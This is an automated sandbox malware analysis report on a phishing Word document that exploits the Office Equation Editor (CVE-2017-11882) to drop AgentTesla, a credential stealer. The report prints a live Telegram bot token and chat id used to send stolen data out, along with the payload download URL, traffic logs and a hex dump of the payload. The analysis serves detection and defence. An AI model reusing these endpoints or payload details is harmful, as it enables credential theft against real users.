Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase Order_0131021.doc

Overview

General Information

Sample Name:Purchase Order_0131021.doc
Analysis ID:502700
MD5:fc66be4a9696798aff0be8ed97bd294f
SHA1:cf158b670ec831531a233d41872d1a9ee3850ff1
SHA256:8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 236 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • gudostrp.exe (PID: 1212 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
      • gudostrp.exe (PID: 2576 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.gudostrp.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.gudostrp.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                4.2.gudostrp.exe.31ca110.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.gudostrp.exe.31ca110.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    4.2.gudostrp.exe.3200330.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 144.76.47.167, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\gudostrp.exe, NewProcessName: C:\Users\user\AppData\Roaming\gudostrp.exe, OriginalFileName: C:\Users\user\AppData\Roaming\gudostrp.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 512, ProcessCommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, ProcessId: 1212

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.2.gudostrp.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}
                      Source: gudostrp.exe.2576.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Purchase Order_0131021.docVirustotal: Detection: 36%Perma Link
                      Source: Purchase Order_0131021.docReversingLabs: Detection: 35%
                      Antivirus detection for URL or domainShow sources
                      Source: http://palangavra.lt/jukiestay/gufoxqa.exeAvira URL Cloud: Label: malware
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exeJump to behavior
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
                      Source: global trafficDNS query: name: palangavra.lt
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 144.76.47.167:80
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                      Source: global trafficHTTP traffic detected: POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Oct 2021 08:22:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 14 Oct 2021 01:10:12 GMTAccept-Ranges: bytesContent-Length: 486912Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 82 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 a4 e7 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 73 07 00 53 00 00 00 00 80 07 00 d4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 90 a8 06 00 58 cb 00 00 02 00 00 00 5c 00 00 06 b0 45 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 0d 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 08 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 0d 01 00 06 72 f3 45 00 70 7e 3d 00 00 04 02 28 0d 01 00 06 28 13 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 00 01 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 0d 01 00 06 72 f7 45 00 70 7e 42 00 00 04
                      Source: global trafficHTTP traffic detected: GET /jukiestay/gufoxqa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: palangavra.ltConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmpString found in binary or memory: http://SwonTwAJYn3XCAV3.net
                      Source: gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: gudostrp.exe, 00000005.00000002.723083857.00000000060F3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: http://yBlQIu.com
                      Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/
                      Source: gudostrp.exe, 00000005.00000002.722105371.0000000000788000.00000004.00000020.sdmp, gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocumentdocument-----
                      Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgP
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmpJump to behavior
                      Source: unknownDNS traffic detected: queries for: palangavra.lt
                      Source: global trafficHTTP traffic detected: GET /jukiestay/gufoxqa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: palangavra.ltConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\gudostrp.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exeJump to dropped file
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.2.gudostrp.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bCB2C1C74u002d7A68u002d46F5u002dB599u002d45991AE15A88u007d/A406E5E7u002dDEBAu002d4106u002dAAAEu002dB593294D8F00.csLarge array initialization: .cctor: array initializer size 12005
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030348D4_2_0030348D
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00308ED74_2_00308ED7
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00721D304_2_00721D30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA5EA84_2_01FA5EA8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA00064_2_01FA0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB00484_2_01FB0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB57204_2_01FB5720
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC00484_2_01FC0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC56204_2_01FC5620
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC929C4_2_01FC929C
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD00484_2_01FD0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD90FD4_2_01FD90FD
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD59084_2_01FD5908
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD00064_2_01FD0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_02025CE84_2_02025CE8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_020319A24_2_020319A2
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D00484_2_041D0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041DE1684_2_041DE168
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030364F4_2_0030364F
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB00064_2_01FB0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_002560485_2_00256048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025F2B85_2_0025F2B8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_002554305_2_00255430
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025D4585_2_0025D458
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_002557785_2_00255778
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025AF405_2_0025AF40
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_002521975_2_00252197
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00559C405_2_00559C40
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_005502F15_2_005502F1
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_005537E85_2_005537E8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00556E485_2_00556E48
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_005594685_2_00559468
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0055B5205_2_0055B520
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00553F9D5_2_00553F9D
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00726CD0 CreateProcessAsUserW,4_2_00726CD0
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                      Source: Purchase Order_0131021.docVirustotal: Detection: 36%
                      Source: Purchase Order_0131021.docReversingLabs: Detection: 35%
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rchase Order_0131021.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD1AF.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: gudostrp.exe.2.dr, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
